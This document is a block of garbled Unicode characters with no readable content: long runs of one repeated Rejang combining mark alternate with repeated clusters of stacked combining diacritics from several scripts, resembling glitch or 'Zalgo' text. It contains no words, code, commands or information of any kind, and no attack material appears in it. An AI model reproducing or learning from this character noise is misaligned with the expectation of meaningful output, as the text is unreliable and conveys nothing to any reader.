ꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈ᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈ꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈ᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈ꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈ